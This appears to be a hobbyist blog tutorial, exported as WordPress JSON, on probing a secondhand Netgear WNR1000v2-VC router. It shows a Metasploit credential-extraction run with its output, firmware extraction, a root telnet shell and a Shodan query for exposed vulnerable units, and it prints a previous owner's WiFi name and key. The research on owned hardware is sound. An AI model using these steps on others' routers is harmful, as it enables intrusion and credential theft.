{"id":1109,"date":"2018-06-04T21:51:43","date_gmt":"2018-06-05T03:51:43","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?p=1109"},"modified":"2018-11-29T08:20:28","modified_gmt":"2018-11-29T14:20:28","slug":"have-fun-at-goodwill-finding-networking-equipment-for-fun-and-profit","status":"publish","type":"post","link":"https:\/\/www.jedge.com\/wordpress\/2018\/06\/have-fun-at-goodwill-finding-networking-equipment-for-fun-and-profit\/","title":{"rendered":"Have fun at Goodwill \u2013 Finding Networking Equipment for Fun and Profit"},"content":{"rendered":"

\"NetgearA great place to pick up outdated, and potentially vulnerable, wireless routers is your local Goodwill. Depending on the store those shelves can be packed with devices for only a couple bucks. While you are there you can just Google the model number followed by \u201cexploit\u201d or \u201copenwrt\u201d to see if you have a device worth playing with. Today I got a Netgear WNR1000v2 and will detail my quick adventures with this device.
\n
\nI performed a “factory reset”<\/a> on the device before I started writing this tutorial. This usually involves a paper-clip and holding the reset button on the back of the device for a number of seconds. I authenticated to the web portal from the LAN segment, identified the firmware version, enabled Remote Management.<\/p>\n

\"Netgear<\/p>\n

This device is running firmware version 1.0.0.3NA. The current version according to the Netgear website is 1.1.2.60NA. However, this device also shows as model WNR1000-VC which is a custom device given to Comcast customers<\/a>. The latest firmware for this device 1.2.2.73. The device I bought probably hasn’t been updated since Comcast provided it to the customer. Google searching shows that this device has exploits available including a Metasploit module. Note: Netgear patched the issue for their latest firmware for the WNR1000v2 but the most current WNR1000v2-VC from Comcast is still vulnerable.
\n

msf &gt; use auxiliary\/admin\/http\/netgear_soap_password_extractor\nmsf auxiliary(admin\/http\/netgear_soap_password_extractor) &gt; set RHOST 192.168.50.10\nmsf auxiliary(admin\/http\/netgear_soap_password_extractor) &gt; set RPORT 8080\nmsf auxiliary(admin\/http\/netgear_soap_password_extractor) &gt; run\n\n[*] Trying to access the configuration of the device\n[*] Extracting Firmware version...\n[+] Model WNR1000v2-VC found\n[+] Firmware version V1.0.0.3 found\n[+] Device details downloaded to: \/root\/.msf4\/loot\/20180604125559_default_192.168.50.10_netgear_soap_dev_720162.txt\n[*] Extracting credentials...\n[*] Credentials found, extracting...\n[+] admin \/ Password1 credentials found\n[+] Account details downloaded to: \/root\/.msf4\/loot\/20180604125559_default_192.168.50.10_netgear_soap_acc_391526.txt\n[*] Extracting Wifi...\n[+] Wifi SSID: Mcmanus\n[+] Wifi Encryption: WPA-PSK\/WPA2-PSK\n[*] Extracting WPA Keys...\n[+] Wifi Password: chatham1\n[*] Auxiliary module execution completed<\/code><\/pre><\/p>\n
The password identified I set myself. However, the WiFi SSID and WPA-PSK are from the previous owner of the device. These settings were not wiped by the “factory reset”.<\/p>\n
After the exploit was successful in extracting the wireless SSID and the PSK I performed a 30-30-30 rule just to be sure this information is retained after a factory reset. This involves holding the reset button for 30 seconds on, 30 seconds off, and 30 seconds on. NOTE: this did nothing so you need to follow the Netgear instructions. This means those WiFi settings are not reset (at least for firmware v1.0.0.3NA).<\/p>\n
Binwalk the Firmware<\/strong>
\nFollow the “Quick Start Guide”<\/a> for installing binwalk. I downloaded the latest firmware from the Netgear website and extracted the filesystem using binwalk.
\n
root@:~\/Work\/Hardware.Hacking\/WRN1000v2# binwalk -e WNR1000v2-V1.1.2.60NA.img\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n192 0xC0 Squashfs filesystem, big endian, version 3.0, size: 3447077 bytes, 1033 inodes, blocksize: 65536 bytes, created: 2017-06-30 18:29:07\n\nroot@:~\/Work\/Hardware.Hacking\/WRN1000v2# ls _WNR1000v2-V1.1.2.60NA.img.extracted\/squashfs-root\/\nbin dev firmware_region hardware_version jffs mnt proc sbin tmp var\ndefault_language_version etc firmware_version image lib module_name rom sys usr www\n\nroot@:~\/Work\/Hardware.Hacking\/WRN1000v2\/_WNR1000v2-V1.1.2.60NA.img.extracted\/squashfs-root# cat etc\/banner\n_______ ________ __\n| |.-----.-----.-----.| | | |.----.| |_\n| - || _ | -__| || | | || _|| _|\n|_______|| __|_____|__|__||________||__| |____|\n|__| W I R E L E S S F R E E D O M\nKAMIKAZE (7.09) -----------------------------------\n* 10 oz Vodka Shake well with ice and strain\n* 10 oz Triple sec mixture into 10 shot glasses.\n* 10 oz lime juice Salute!\n---------------------------------------------------<\/code><\/pre><\/p>\n
So we got a device that runs Openwrt, though a very old version. The great thing is the latest version of Openwrt<\/a> exists for this device.<\/p>\n
Serial Port<\/strong>
\nThe Openwrt Wiki for the device provides the pinout for the serial port but it is incorrect. The image below shows the proper pinout. So crack open the device and connect a USB to Serial adapter and see what is actually on the device. This link<\/a> is to the boot up of my device.
\n\"Netgear<\/p>\n
Enable Telnet<\/strong>
\nMany Netgear devices with stock firmware allow you to enable telnet<\/a>. Using “method 1” described in the Wiki does not work for the WNR1000v2-VC. Maybe Comcast removed setup.cgi as it does not exist on the device (I searched while connected via the serial port). While connected via serial I saw that I could just enable utelnetd in the \/etc\/init.d directory but that is not what we are trying to accomplish. You can follow the instructions in the Wiki for sending the “Magic Packet” to enable telnet.
\n
C:\\tools&gt;arp -a\n\nInterface: 172.16.0.3 --- 0xc\nInternet Address Physical Address Type\n172.16.0.1 00-26-f2-eb-56-16 dynamic\n\nC:\\tools&gt;telnetEnable.exe 172.16.0.1 0026F2EB5616 someusername somepassword\n\nC:\\tools&gt;telnet 172.16.0.1\n=== IMPORTANT ============================\nUse 'passwd' to set your login password\nthis will disable telnet and enable SSH\n------------------------------------------\n\nBusyBox v1.4.2 (2009-09-09 23:04:26 CST) Built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n_______ ________ __\n| |.-----.-----.-----.| | | |.----.| |_\n| - || _ | -__| || | | || _|| _|\n|_______|| __|_____|__|__||________||__| |____|\n|__| W I R E L E S S F R E E D O M\nKAMIKAZE (7.09) -----------------------------------\n* 10 oz Vodka Shake well with ice and strain\n* 10 oz Triple sec mixture into 10 shot glasses.\n* 10 oz lime juice Salute!\n---------------------------------------------------\nroot@WNR1000v2:\/#<\/code><\/pre><\/p>\n
Shodan.io<\/strong>
\nSearch for “Server: uhttpd\/1.0.0 WNR1000v2” and you will find way too many of these devices connected to the Internet, plenty of them from Comcast.<\/p>\n
Resources<\/strong>
\nhttps:\/\/www.netgear.com\/support\/product\/WNR1000v2<\/a>
\nhttps:\/\/kb.netgear.com\/9665\/How-do-I-perform-a-factory-reset-on-my-NETGEAR-router <\/a>
\nhttp:\/\/www.downloads.netgear.com\/files\/GDC\/WNR1000V2\/WNR1000v2-V1.1.2.60NA.zip<\/a>
\nhttps:\/\/community.netgear.com\/t5\/Wireless-N-Routers\/WNR1000v2-Force-firmware-to-router\/td-p\/434767<\/a>
\nhttps:\/\/github.com\/ReFirmLabs\/binwalk\/wiki\/Quick-Start-Guide<\/a>
\nhttps:\/\/openwrt.org\/toh\/netgear\/telnet.console<\/a>
\nhttps:\/\/openwrt.org\/toh\/netgear\/wnr1000_v2<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
A great place to pick up outdated, and potentially vulnerable, wireless routers is your local Goodwill. Depending on the store those shelves can be packed with devices for only a couple bucks. While you are there you can just Google the model number followed by \u201cexploit\u201d or \u201copenwrt\u201d to see if you have a device […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[163,114],"tags":[36,175,123],"class_list":["post-1109","post","type-post","status-publish","format-standard","hentry","category-hacking","category-hardware-hacking","tag-metasploit","tag-netgear","tag-openwrt"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=1109"}],"version-history":[{"count":10,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1109\/revisions"}],"predecessor-version":[{"id":1157,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1109\/revisions\/1157"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=1109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/categories?post=1109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/tags?post=1109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}